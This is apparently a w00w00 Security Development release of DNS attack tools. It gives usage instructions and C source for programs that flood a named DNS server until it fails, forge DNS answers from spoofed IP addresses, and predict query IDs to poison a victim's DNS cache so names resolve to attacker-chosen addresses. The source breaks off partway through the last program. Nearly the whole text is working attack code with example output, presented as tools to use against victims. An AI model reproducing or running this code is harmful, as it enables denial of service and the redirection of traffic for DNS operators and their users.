WSD-baddns is a program to destroy the DNS.
It's very, very simple to use !!! :)
/* I'm a w00w00ify'd w00c0w */
Usage: WSD-baddns <victim>
Example: WSD-baddns bob.lenet.fr
2: WSDsniffID
WSDsniffID is a DNS hijacker. You need to have root privileges. It's
for a LAN only :)
Usage:
WSDsniffID <device> <spoof IP> <spoof NAME> [type 1 or 12 ]
'' by type we mean 1 = TYPE A 12 = TYPE PTR ''
Example:
WSDsniffID eth0 31.3.3.7 www.i.m.mucho.horny.ya 12 (We are hijacking a PTR)
So now if someone runs "nslookup <one ip>" on a network they have:
[root@w00w00 w0w0w]# nslookup 1.2.3.4
Server: localhost
Address: 127.0.0.1
Name: www.i.m.mucho.horny.ya
Address: 1.2.3.4
3: --= WSDspoofID =--
1) Before you need root on a NS with AUTH over a domain (for example
shok.janova.org has authority over *.janova.org)
WSDspoofID is a DNS ID predictor (but you need to have root on a NS or
you need to the privileges to sniff the NS)
Usage:
WSDspoofID <device to spoof> <NS victim> <your domain> <ip of your dns>
<type (1,12)> <spoof name> <spoof ip> <ns with auth on spoof ip or name>
Example:
WSDspoofID ppp0 NS2.MCI.NET janova.org shok.janova.org 12
www.i.m.ereet.ya 194.206.23.123 ns2.provnet.fr ..
Well after that when you ask NS2.MCI.NET for 194.206.23.123 you have:
[root@w00w00 w0w0w]# nslookup 194.206.23.123 ns2.mci.net
Server: ns2.mci.net
Address: 204.70.57.242
Name: www.i.m.ereet.ya
Address: 194.206.23.123
[root@w00w00 w0w0w]#
We will use ns2.provnet.fr because ns2.provnet.fr has AUTH on 194.206.23.*
To find out who has AUTH on 194.206.23.*, you just need to do the
following:
[root@w00w00 w0w0w]# host -t NS 23.206.194.in-addr.arpa
23.206.194.in-addr.arpa name server NS2.PROVNET.FR
23.206.194.in-addr.arpa name server BOW.RAIN.FR
23.206.194.in-addr.arpa name server NS1.PROVNET.FR
[root@w00w00 w0w0w]#
To find out the NS who haas AUTH on, for example, *.provnet.fr:
[root@w00w00 w0w0w]# host -t NS provnet.fr
provnet.fr name server NS1.provnet.fr
provnet.fr name server BOW.RAIN.fr
provnet.fr name server NS2.provnet.fr
[root@w00w00 w0w0w]#
Note: The entry can change!!! You can get NS1 first.
Here is the source... to our programs
----[ BUGS ]----
1: The bit field on Solaris causes a bus error..
We will fix it soon
----[END of BUGS ]----
----[WSD-spoof.c]----
/* ******************************************************************** */
/* w00w00 functions for spoofing UDP */
/* ------------------------------------------------------------------- */
/* w00w00 Security Development (WSD) */
/* Email: WSD@w00w00.org */
/* Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */
/* ******************************************************************** */
#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <unistd.h>
#include <memory.h>
#include <string.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include "ip.h"
#include "udp.h"
#define IPHDRSIZE sizeof(struct iphdr)
#define UDPHDRSIZE sizeof(struct udphdr)
/*****************************************************************************/
/*
* in_cksum --
* Checksum routine for Internet Protocol family headers (C Version)
*/
/*****************************************************************************/
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}
int udp_send(s, saddr, daddr, sport, dport, datagram, datasize)
int s;
unsigned long saddr;
unsigned long daddr;
unsigned short sport;
unsigned short dport;
char *datagram;
unsigned datasize;
{
int x;
unsigned char *data;
unsigned char packet[4024];
struct iphdr *ip;
struct udphdr *udp;
struct sockaddr_in sin;
ip = (struct iphdr *)packet;
udp = (struct udphdr *)(packet+IPHDRSIZE);
data = (unsigned char *)(packet+IPHDRSIZE+UDPHDRSIZE);
memset(packet, 0, sizeof(packet));
udp->source = htons(sport);
udp->dest = htons(dport);
udp->len = htons(UDPHDRSIZE+datasize);
udp->check = 0;
memcpy(data, datagram, datasize);
memset(packet, 0, IPHDRSIZE);
ip->saddr.s_addr = saddr;
ip->daddr.s_addr = daddr;
ip->version = 4;
ip->ihl = 5;
ip->ttl = 245;
ip->id = random() % 5985 + 1;
ip->protocol = IPPROTO_UDP;
ip->tot_len = htons(IPHDRSIZE + UDPHDRSIZE + datasize);
ip->check = 0;
ip->check = in_cksum((char *)packet, IPHDRSIZE);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr=daddr;
sin.sin_port = udp->dest;
x = sendto(s, packet, IPHDRSIZE+UDPHDRSIZE+datasize, 0,
(struct sockaddr*)&sin, sizeof(struct sockaddr));
return(x);
}
/*****************************************************************************/
/* RECV PAKET */
/* get_pkt(socket, *buffer, size of the buffer); */
/*****************************************************************************/
int get_pkt(s, data, size)
int s;
unsigned char *data;
int size;
{
struct sockaddr_in sin;
int len, resu;
len = sizeof(sin);
resu = recvfrom(s, data, size, 0, (struct sockaddr *)&sin, &len);
return resu;
}
----[END of WSD-spoof.c]----
----[WSD-DNS2.c]----
/* ****************************************************** */
/* w00w00 code for DNS packets Super Raw */
/* ------------------------------------------------------ */
/* w00w00 Security Development (WSD) */
/* Email: WSD@w00w00.org */
/* Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */
/* ****************************************************** */
#define ERROR -1
#define TYPE_A 1
#define TYPE_PTR 12
#define MAXLEN 64
#define DNSHDRSIZE 12
int myrand()
{
int j = 1 + (int)(150.0 * rand() / (RAND_MAX + 1.0));
return(j);
}
unsigned long host2ip(char *serv)
{
struct hostent *hent;
struct sockaddr_in sinn;
hent = gethostbyname(serv);
if (hent == NULL) {
herror("gethostbyname");
exit(ERROR);
}
bzero((char *)&sinn, sizeof(sinn));
bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length);
return sinn.sin_addr.s_addr;
}
void nameformat(char *name, char *qs)
{
int i;
int a = 0;
char lol[3000];
char tmp[2550], tmp2[2550];
if (strlen(name) > sizeof(tmp) - 1) {
fprintf(stderr, "nameformat(): name too long: %s\n", name);
exit(ERROR);
}
bzero(lol, sizeof(lol));
bzero(tmp, sizeof(tmp));
bzero(tmp2, sizeof(tmp2));
for (i = 0; i < strlen(name); i++) {
if (*(name+i) == '.') {
sprintf(tmp2, "%c%s", a, tmp);
strcat(lol, tmp2);
bzero(tmp, sizeof(tmp));
bzero(tmp2, sizeof(tmp2));
a = 0;
} else
tmp[a++] = *(name+i);
}
sprintf(tmp2, "%c%s", a, tmp);
strcat(lol, tmp2);
strcpy(qs, lol);
}
void nameformatIP(char *ip, char *resu)
{
int i, a = 3, k = 0;
char c;
char *A[4];
char nameform[256];
char tmp[256], tmp1[256];
char *arpa = "in-addr.arpa";
if (strlen(ip) > sizeof(nameform) - 1) {
fprintf(stderr, "nameformatIP(): name too long: %s\n", ip);
exit(ERROR);
}
bzero(tmp, sizeof(tmp));
bzero(tmp1, sizeof(tmp1));
bzero(nameform, sizeof(nameform));
for (i = 0; i < 4; i++) {
A[i] = (char *)malloc(4);
if (A[i] == NULL) {
perror("malloc");
exit(ERROR);
}
bzero(A[i], 4);
}
bzero(tmp, sizeof(tmp));
bzero(tmp1, sizeof(tmp1));
for (i = 0; i < strlen(ip); i++) {
c = ip[i];
if (c == '.') {
strcat(A[a], tmp);
a--;
k = 0;
bzero(tmp, sizeof(tmp));
} else tmp[k++] = c;
}
strcat(A[a], tmp);
for (i = 0; i < 4; i++) {
strcat(tmp1, A[i]);
strcat(tmp1, ".");
}
strcat(tmp1, arpa);
nameformat(tmp1, nameform);
strcpy(resu, nameform);
}
int makepacketQS(char *data, char *name, int type)
{
if (type == TYPE_A) {
nameformat(name, data);
*((u_short *) (data+strlen(data)+1)) = htons(TYPE_A);
}
if (type == TYPE_PTR) {
nameformatIP(name,data);
*((u_short *) (data+strlen(data)+1)) = htons(TYPE_PTR);
}
*((u_short *) (data+strlen(data)+3)) = htons(1);
return(strlen(data)+5);
}
int makepacketAW(char *data, char *name, char *ip, int type)
{
int i;
char tmp[2550];
bzero(tmp, sizeof(tmp));
if (type == TYPE_A) {
nameformat(name, data);
*((u_short *) (data+strlen(data)+1)) = htons(1);
*((u_short *) (data+strlen(data)+3)) = htons(1);
i = strlen(data)+5;
strncpy(data+i, data, MAXLEN);
i = i+strlen(data)+1;
*((u_short *) (data+i)) = htons(TYPE_A);
*((u_short *) (data+i+2)) = htons(1);
*((u_long *) (data+i+4)) = 9999999;
*((u_short *) (data+i+8)) = htons(4);
*((u_long *) (data+i+10)) = host2ip(ip);
return(i+14);
}
if (type == TYPE_PTR) {
nameformat(name, tmp);
nameformatIP(ip, data);
*((u_short *) (data+strlen(data)+1)) = htons(TYPE_PTR);
*((u_short *) (data+strlen(data)+3)) = htons(1);
i = strlen(data)+5;
strncpy((data+i), data, MAXLEN);
i = (i+strlen(data)+1);
*((u_short *) (data+i)) = htons(TYPE_PTR);
*((u_short *) (data+i+2)) = htons(1);
*((u_long *) (data+i+4)) = 9999999;
*((u_short *) (data+i+8)) = htons(strlen(tmp)+1);
strncpy((data+i+10), tmp, MAXLEN);
return(i+10+strlen(tmp)+1);
}
/* You were only supposed to use type A or PTR! Bad people. */
return(ERROR);
}
void sendquestion(u_long s_ip, u_long d_ip,char *name,int type)
{
int i;
int on=1;
int sraw;
char *data;
char buff[1024];
struct dnshdr *dns;
sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sraw == ERROR) {
perror("socket");
exit(ERROR);
}
if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)))
== ERROR) {
perror("setsockopt");
exit(ERROR);
}
dns = (struct dnshdr *) buff;
data = (char *)(buff+DNSHDRSIZE);
bzero(buff, sizeof(buff));
dns->id = 6000+myrand();
dns->qr = 0;
dns->rd = 1;
dns->aa = 0;
dns->que_num = htons(1);
dns->rep_num = htons(0);
i = makepacketQS(data, name, type);
udp_send(sraw, s_ip, d_ip, 1200+myrand, 53, buff, DNSHDRSIZE+i);
close(sraw);
}
void sendanswer(s_ip, d_ip, name, spoofip, ID, type)
u_long s_ip;
u_long d_ip;
char *name;
char *spoofip;
int ID;
int type;
{
int i;
int on=1;
int sraw;
char *data;
char buff[1024];
struct dnshdr *dns;
sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sraw == ERROR) {
perror("socket");
exit(ERROR);
}
if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)))
== ERROR) {
perror("setsockopt");
exit(ERROR);
}
dns = (struct dnshdr *) buff;
data = (char *)(buff+DNSHDRSIZE);
bzero(buff, sizeof(buff));
dns->id = htons(ID);
dns->qr = 1;
dns->rd = 1;
dns->aa = 1;
dns->que_num = htons(1);
dns->rep_num = htons(1);
i = makepacketAW(data, name, spoofip, type);
udp_send(sraw, s_ip, d_ip, 53, 53, buff, DNSHDRSIZE+i);
close(sraw);
}
void dnsspoof(dnstrust, victim, spoofname, spoofip, ID, type)
char *dnstrust;
char *victim;
char *spoofname;
char *spoofip;
int ID;
int type;
{
int loop, rere;
u_long fakeip, trustip, victimip;
char *data;
char buff[1024];
struct dnshdr *dns;
dns = (struct dnshdr *)buff;
data = (char *)(buff+DNSHDRSIZE);
trustip = host2ip(dnstrust);
victimip = host2ip(victim);
fakeip = host2ip("12.1.1.0");
/* send question ... */
if (type == TYPE_PTR)
for (loop = 0; loop < 4; loop++)
sendquestion(fakeip, victimip, spoofip, type);
if (type == TYPE_A)
for (loop = 0; loop < 4; loop++)
sendquestion(fakeip, victimip, spoofname, type);
/* Answer quickly! */
for (rere = 0; rere < 2; rere++)
for (loop = 0; loop < 80; loop++) {
printf("trustip: %s, vitcimip: %s, spoofname: %s, spoofip: %s,"
"ID: %i, type: %i\n",
dnstrust, victim, spoofname, spoofip, ID+loop, type);
sendanswer(trustip, victimip, spoofname, spoofip, ID+loop, type);
}
}
----[END of WSD-DNS2.c]----
----[WSD-baddns.c ]----
/* ******************************************************* */
/* w00w00 DNS attack (Denial of Service) */
/* w00w00 Security Development (WSD) */
/* ------------------------------------------------------- */
/* Email: WSD@w00w00.org */
/* Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */
/* ******************************************************* */
#include "WSD-spoof.c"
#include "dns.h"
#include "WSD-DNS2.c"
#define ERROR -1
#define VERSION "v0.2"
#define DNSHDRSIZE 12
void main(int argc, char **argv)
{
int sraw, on = 1;
unsigned long s_ip, d_ip;
char *data;
char buf[4000];
unsigned char names[255];
struct dnshdr *dns;
printf("w00w00!\n");
if (argc < 2) {
printf("Usage: %s <host>\n", argv[0]);
printf("w00w00 DNS Attack - WSD@w00w00.org\n");
exit(0);
}
dns = (struct dnshdr *)buf;
data = (char *)(buf+12);
bzero(buf, sizeof(buf));
sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sraw == ERROR) {
perror("socket");
exit(ERROR);
}
if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)))
== ERROR) {
perror("setsockopt");
exit(ERROR);
}
printf("WSD-baddns %s: DNS attack - w00w00 Security Development (WSD)\n",
VERSION);
sleep(1);
s_ip = host2ip("100.1.2.3");
d_ip = host2ip(argv[1]);
dns->id = 123;
dns->rd = 1;
dns->que_num = htons(1);
while(1) {
sprintf(names, "\3%d\3%d\3%d\3%d\07in-addr\04arpa",
myrand(), myrand(), myrand(), myrand());
printf("%s\n", names);
strcpy(data, names);
*((u_short *) (data+strlen(names)+1)) = ntohs(12);
*((u_short *) (data+strlen(names)+3)) = ntohs(1);
udp_send(sraw, s_ip, d_ip, 2600+myrand(), 53, buf, 14+strlen(names)+5);
s_ip = ntohl(s_ip);
s_ip++;
s_ip = htonl(s_ip);
}
}
----[END of WSD-baddns.c]----
----[WSDkillDNS.c ]----
/* *********************************************** */
/* w00w00 DNS Killer (Brutal attack) */
/* ----------------------------------------------- */
/* Email: WSD@w00w00.org */
/* WWW: http://www.w00w00.org */
/* FTP: ftp://ftp.w00w00.org/pub */
/* *********************************************** */
#include "WSD-spoof.c"
#include "dns.h"
#include "WSD-DNS2.c"
#define ERROR -1
#define ID_START 1
#define ID_STOP 65535
#define VERSION "v0.3"
#define PORT_START 53
#define PORT_STOP 54
void main(int argc, char **argv)
{
struct dnshdr *dns;
char *data;
char buffer2[4000];
unsigned char names[255];
unsigned long s_ip, s_ip2;
unsigned long d_ip, d_ip2;
int sraw, i, on=1, x, loop;
int idstart, idstop, portstart, portstop;
printf("w00w00!\n");
printf("w00w00 Security Development (WSD)\n");
printf("WSD@w00w00.org\n");
if (argc < 5) {
system("/usr/bin/clear");
printf("w00w00!\n");
printf("w00w00 Security Development (WSD)\n");
printf("WSD@w00w00.org\n\n");
printf(" Usage : %s <ip src> <ip dst> <name> <ip>\n\t[A,B,N] [ID_START] [ID_STOP] [PORT START] [PORT STOP] \n",argv[0]);
printf(" ip src: ip source of the dns anwser\n");
printf(" ip dst: ip of the dns victim\n");
printf(" name : spoof name i.e.: www.dede.com\n");
printf(" ip : the ip associated with the name\n");
printf(" options:\n");
printf(" [A,B,N]...\n");
printf(" A: flood the DNS victim with multiple queries\n");
printf(" B: DoS attack to crash the DNS\n");
printf(" N: No attacks\n\n");
printf(" [ID_START] \n");
printf(" ID_START: id start :> \n\n");
printf(" [ID_STOP]
n");
printf(" ID_STOP : id stop :> \n\n");
printf(" PORT START, PORT STOP: send the spoof to the portstart at portstop\n\n");
exit(ERROR);
}
dns = (struct dnshdr *)buffer2;
data = (char *)(buffer2+DNSHDRSIZE);
bzero(buffer2, sizeof(buffer2));
sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sraw == ERROR) {
perror("socket");
exit(ERROR);
}
if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)))
== ERROR){
perror("setsockopt");
exit(ERROR);
}
printf("WSDkillDNS %s \n", VERSION);
s_ip2 = s_ip = host2ip(argv[1]);
d_ip2 = d_ip = host2ip(argv[2]);
if (argc > 5)
if (*argv[5]=='A')
for (loop=0; loop < 10; loop++) {
dns->id = 6000+loop;
dns->qr = 0;
dns->rd = 1;
dns->aa = 0;
dns->que_num = htons(1);
dns->rep_num = htons(0);
i = makepacketQS(data, argv[3], TYPE_A);
udp_send(sraw, s_ip, d_ip, 1200+loop, 53, buffer2, DNSHDRSIZE+i);
s_ip = ntohl(s_ip);
s_ip++;
s_ip = htonl(s_ip);
}
if (argc > 5)
if (*argv[5]=='B') {
s_ip = host2ip("100.1.2.3");
dns->id = 123;
dns->rd = 1;
dns->que_num = htons(1);
printf("Enter the number of packets to send: ");
scanf("%d",&i);
for (x = 0; x < i; x++) {
sprintf(names, "\3%d\3%d\3%d\3%d\07in-addr\04arpa",
myrand(), myrand(), myrand(), myrand());
strcpy(data, names);
*((u_short *) (data+strlen(names)+1)) = ntohs(12);
*((u_short *) (data+strlen(names)+3)) = ntohs(1);
udp_send(sraw, s_ip, d_ip, 2600+myrand(), 53, buffer2,
14+strlen(names)+5);
s_ip = ntohl(s_ip);
s_ip++;
s_ip = htonl(s_ip);
printf("send packet # %i:%i\n", x, i);
}
}
if (argc > 6) idstart = atoi(argv[6]);
else idstart = ID_START;
if (argc > 7) idstop = atoi(argv[7]);
else idstop = ID_STOP;
if (argc > 8) {
portstart = atoi(argv[8]);
portstop = atoi(argv[9]);
} else {
portstart = PORT_START;
portstop = PORT_STOP;
}
bzero(buffer2, sizeof(buffer2));
bzero(names, sizeof(names));
i = 0 , x = 0;
s_ip = s_ip2, d_ip = d_ip2;
for (; idstart < idstop; idstart++) {
dns->id = htons(idstart);
dns->qr = 1;
dns->rd = 1;
dns->aa = 1;
dns->que_num = htons(1);
dns->rep_num = htons(1);
(void) printf("send awnser with id %i to port %i at port %i\n",
idstart, portstart, portstop);
i = makepacketAW(data, argv[3], argv[4], TYPE_A);
for (; x < portstop; x++)
udp_send(sraw, s_ip, d_ip, 53, x, buffer2, DNSHDRSIZE+i);
x = portstart;
}
printf(" terminated..\n");
}
----[END of WSDkillDNS.c ]----
----[WSD-IDpred.c ]----
/* ******************************************************* */
/* w00w00 DNS ID Predictor Super Raw */
/* ------------------------------------------------------- */
/* Email: WSD@w00w00.org */
/* Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */
/* ******************************************************* */
#include <fcntl.h>
#include "dns.h"
#include "WSD-spoof.c"
#include "WSD-DNS2.c"
#define ERROR -1
#define DNSHDRSIZE 12
#define TIMEOUT 300
#define VERSION "v0.7"
#define SPOOFIP "4.4.4.4"
#define UNDASPOOF "111.111.111.111"
#define LEN sizeof(struct sockaddr)
void usage()
{
printf("w00w00 DNS ID Predictor\n");
printf("w00w00 Security Development (WSD)\n");
printf("WSD@w00w00.org\n");
printf(" WSD-idpred <your ip> <dns trust> <domaine trust> <ip victim> <TYPE> <spoof name> <spoof ip> <ns.trust.for.the.spoof> [ID] \n");
printf("\n Ex: WSD-idpred ppp.evil.com ns1.victim.com provnet.fr ns.victim.com 1 mouhhahahaha.hol.fr 31.3.3.7 ns.isdnet.net [ID] \n");
printf(" We are going to poison ns.victim.com so they resolve mouhhahaha.hol.fr in 31.3.3.7\n");
printf(" We use provnet.fr and ns1.provnet for finding the ID of ns.victim.com\n");
printf(" We use ns.isdnet.net for spoofing because they have AUTH on *.hol.fr\n");
printf(" For more information check ftp.w00w00.org/pub/DNS/\n");
printf(" Mail WSD@w00w00.org.\n");
exit(ERROR);
}
void senddnspkt(s, d_ip, wwwname, ip, dns)
int s;
u_long d_ip;
char *wwwname;
char *ip;
struct dnshdr *dns;
{
int i;
char buffer[1024];
char *data = (char *)(buffer+DNSHDRSIZE);
struct sockaddr_in sin;
bzero(buffer, sizeof(buffer));
memcpy(buffer, dns, DNSHDRSIZE);
if (dns->qr == 0) {
i = makepacketQS(data, wwwname, TYPE_A);
sin.sin_family = AF_INET;
sin.sin_port = htons(53);
sin.sin_addr.s_addr = d_ip;
sendto(s, buffer, DNSHDRSIZE+i, 0, (struct sockaddr *)&sin, LEN);
} else {
i = makepacketAW(data, wwwname, ip, TYPE_A);
sin.sin_family = AF_INET;
sin.sin_port = htons(53);
sin.sin_addr.s_addr = d_ip;
sendto(s, buffer, DNSHDRSIZE+i, 0, (struct sockaddr *)&sin, LEN);
}
}
void dns_qs_no_rd(s, d_ip, wwwname, ID)
int s;
u_long d_ip;
char *wwwname;
int ID;
{
int i;
char *data;
char buffer[1024];
struct dnshdr *dns;
dns = (struct dnshdr *)buffer;
data = (char *)(buffer+DNSHDRSIZE);
bzero(buffer, sizeof(buffer));
dns->id = htons(ID);
dns->qr = 0;
dns->rd = 0; /* dont want the recursion !! */
dns->aa = 0;
dns->que_num = htons(1);
dns->rep_num = htons(0);
i = makepacketQS(data, wwwname, TYPE_A);
senddnspkt(s, d_ip, wwwname, NULL, dns);
}
void main(int argc, char **argv)
{
struct sockaddr_in sin_rcp;
struct dnshdr *dns, *dns_recv;
int len = sizeof(struct sockaddr);
int sraw, s_r, i, on = 1, x, ID, times;
char *alacon;
char host[256];
char dnstrust[256];
char *data, *data2;
char buf[4000], buf1[4000];
char spoofname[256], spoofip[256];
unsigned char fakename
[256];
unsigned char names[256];
unsigned long s_ip, s_ip2;
unsigned long d_ip, d_ip2, trust;
unsigned int DA_ID = 65535, loop = 65535;
dns_recv = (struct dnshdr *)(buf1);
data2 = (char *)(buf1+DNSHDRSIZE);
dns = (struct dnshdr *)buf;
data = (char *)(buf+DNSHDRSIZE);
bzero(buf, sizeof(buf));
srand(time(NULL));
printf("w00w00 DNS ID Predictor\n");
printf("w00w00 Security Development (WSD)\n");
printf("WSD@w00w00.org\n");
s_r = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (s_r == ERROR) {
perror("socket");
exit(ERROR);
}
if ((fcntl(s_r, F_SETFL, O_NONBLOCK)) == ERROR) {
perror("fcntl");
exit(ERROR);
}
sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sraw == ERROR) {
perror("socket");
exit(ERROR);
}
if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))
== ERROR)) {
perror("setsockopt");
exit(ERROR);
}
if (argc < 2) usage();
if (argc > 9) DA_ID = loop = atoi(argv[9]);
if (argc > 6) {
if (strlen(argv[6]) > sizeof(spoofname) - 1) {
fprintf(stderr, "argv[6] too long: %s\n", argv[6]);
exit(ERROR);
} else
strcpy(spoofname, argv[6]);
} else {
printf("Enter the name you want spoof: ");
scanf("%255s", spoofname);
}
if (argc > 7) strncpy (host, argv[7], sizeof(host));
else {
printf("Enter the IP address of the spoof name: ");
scanf("%255s", host);
}
alacon = (char *)inet_ntoa(host2ip(host));
strcpy(spoofip, alacon);
if (argc > 8) {
if (strlen(argv[8]) > sizeof(host) - 1) {
fprintf(stderr, "argv[8] too long: %s\n", argv[8]);
exit(ERROR);
} else
strcpy(host, argv[8]);
} else {
printf("Enter the trusted NS of the victim: ");
scanf("%255s", host);
}
alacon = (char *)inet_ntoa(host2ip(host));
strcpy(dnstrust, alacon);
printf("WSD-IDpred %s w00w00 (WSD) - Super Raw\n", VERSION);
/* save some arguments */
s_ip2 = host2ip(argv[1]);
trust = host2ip(argv[2]);
s_ip = host2ip(UNDASPOOF);
d_ip2 = d_ip = host2ip(argv[4]);
if (strlen(argv[3]) > sizeof(fakename) - 1) {
fprintf(stderr, "argv[3] too long: %s\n", argv[3]);
exit(ERROR);
}
while(1) {
sprintf(fakename, "%d%d%d%d%d%d.%s", myrand(), myrand(), myrand(),
myrand(), myrand(), myrand(), argv[3]);
sendquestion(s_ip, d_ip, fakename, TYPE_A);
/* end of question packet */
bzero(buf, sizeof(buf)); /* re-init some variable */
bzero(names, sizeof(names));
i = 0, x = 0;
/* Here we start the spoof anwser */
ID = loop;
for (; loop >= ID-10; loop--) {
dns->id = htons(loop);
dns->qr = 1;
dns->rd = 1;
dns->aa = 1;
dns->que_num = htons(1);
dns->rep_num = htons(1);
i = makepacketAW(data, fakename, SPOOFIP, TYPE_A);
udp_send(sraw, trust, d_ip2, 53, 53, buf, DNSHDRSIZE+i);
}
bzero(buf, sizeof(buf)); /* re-init some variable */
bzero(names, sizeof(names));
i = 0, x = 0;
/* Time for the test spoof */
/* Here we sending question, nonrecursive */
dns_qs_no_rd(s_r, d_ip2, fakename, myrand());
/* We are waiting for answer ... */
while (1) {
for (times = 0; times < TIMEOUT; times++) {
if (recvfrom(s_r, buf1, sizeof(buf1), 0,
(struct sockaddr *)&sin_rcp,&len) != ERROR) {
printf("We have the response.\n");
times = 0;
break;
}
usleep(10);
times++;
}
if (times != 0) {
printf("We have no response from the NS. Resend question..\n");
dns_qs_no_rd(s_r, d_ip2, fakename, myrand());
} else break;
}
/* Okay we have an answer */
printf("fakename = %s\n", fakename);
if (sin_rcp.sin_addr.s_addr == d_ip2)
if (sin_rcp.sin_port == htons(53))
if (dns_recv->qr == 1) {
if (dns_recv->rep_num == 0) /* We dont have the right ID */
printf("Try %d < ID < %d\n", ID-10, ID);
else {
/* The spoof has worked, we have found the right ID! */
printf("the DNS ID of %s is %d < ID < %d!!\n",
argv[4], loop-10, loop);
printf("Let's send the spoof...\n");
dnsspoof(dnstrust, argv[4], spoofname, spoofip, loop,
atoi(argv[5]));
printf("spoof sent...\n");
exit(0);
}
}
bzero(buf1, sizeof(buf1));
}
}
----[END of WSD-IDpred.c]----
----[ WSDspoofID.c ]----
/* ******************************************************* */
/* w00w00 DNS ID Spoofer Super Raw */
/* w00w00 Security Development (WSD) */
/* ------------------------------------------------------- */
/* Email: WSD@w00w00.org */
/* Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */
/* ******************************************************* */
#include "WSD-spoof.c"
#include "dns.h"
#include "WSD-DNS2.c"
#include <pcap.h>
#include <net/if.h>
#define ERROR -1
#define DNSHDRSIZE 12
#define VERSION "v0.6"
#define SPOOF "127.0.0.1"
int ETHHDRSIZE;
void main(int argc, char **argv)
{
int sraw, i, on=1, con, ID, DA_ID, type;
struct iphdr *ip;
struct udphdr *udp;
struct dnshdr *dnsrecv, *dnssend;
struct pcap *pcap_d;
struct pcap_pkthdr h;
char *buf;
char *alacon;
char host[256];
char ebuf[256];
char buf1[1024];
char namefake[256];
char dnstrust[256];
char *data, *data2;
char spoofip[256], spoofname[256];
unsigned long d_ip;
unsigned long s_ipns;
srand((time(NULL) % random() * random()));
printf("w00w00 DNS ID Spoofer - Super Raw!\n");
printf("w00w00 Security Development (WSD)\n");
printf("WSD@w00w00.org\n");
if (argc < 2) {
printf("Usage: %s <device> <ns.victim.com> <your domain> <IP of your NS> <type 1,12> <spoofname> <spoof ip> <ns trust>\n",argv[0]);
printf("Example: %s eth0 ns.victim.com hacker.org 123.4.5.36 12 damn.diz.ip.iz.ereet.ya mail.provnet.fr ns2.provnet.fr\n",argv[0]);
printf(" So... we try to poison victim.com with type 12 (PTR). Now, if someone asked for the ip of mail.provnet.fr they will resolve to damn.diz.ip.iz.ereet.ya\n");
exit(1);
}
if (strstr(argv[1], "ppp0")) ETHHDRSIZE = 0;
else ETHHDRSIZE = 14;
if (argc > 5) type = atoi(argv[5]);
if (argc > 6) {
if (strlen(argv[6]) > sizeof(spoofname) - 1) {
fprintf(stderr, "argv[6] too long: %s\n", argv[6]);
exit(ERROR);
} else
strcpy(spoofname, argv[6]);
} else {
printf("Enter the name you want to spoof: ");
scanf("%255s", spoofname);
}
if (argc > 7) {
if (strlen(argv[7]) > sizeof(host) - 1) {
fprintf(stderr, "argv[7] too long: %s\n", argv[7]);
exit(ERROR);
} else
strcpy(host, argv[7]);
} else {
printf("Enter the IP of the name to spoof: ");
scanf("%255s", host);
}
alacon = (char *)inet_ntoa(host2ip(host));
strcpy(spoofip, alacon);
if (argc > 8) strncpy (host, argv[8], sizeof(host));
else {
printf("Enter the trusted dns for the spoof: ");
scanf("%255s", host);
}
alacon = (char *)inet_ntoa(host2ip(host));
strcpy(dnstrust, alacon);
dnssend = (struct dnshdr *)buf1;
data2 = (char *)(buf1+DNSHDRSIZE);
bzero(buf1, sizeof(buf1));
sraw = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sraw == ERROR) {
perror("socket");
exit(ERROR);
}
if ((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)))
== ERROR) {
perror("setsockopt");
exit(ERROR);
}
printf("WSDspoofID.c %s w00w00 ID sniffer\n", VERSION);
printf("w00w00 Security Development\n");
sleep(1);
pcap_d = pcap_open_live(argv[1],1024,0,100,ebuf);
s_ipns = host2ip(argv[4]);
d_ip = host2ip(argv[2]);
con = myrand();
/* Make the question to get the ID */
sprintf(namefake, "%d%d%d.%s", myrand(), myrand(), myrand(), argv[3]);
dnssend->id = 2600;
dnssend->qr = 0;
dnssend->rd = 1;
dnssend->aa = 0;
dnssend->que_num = htons(1);
dnssend->rep_num = htons(0);
i = makepacketQS(data2, namefake, TYPE_A);
udp_send(sraw, s_ipns, d_ip,2600+con, 53, buf1, DNSHDRSIZE+i);
printf("Question sent...please wait\n");
while(1) {
buf = (u_char *)pcap_next(pcap_d,&h); /* catch the packet */
ip = (struct iphdr *)(buf+ETHHDRSIZE);
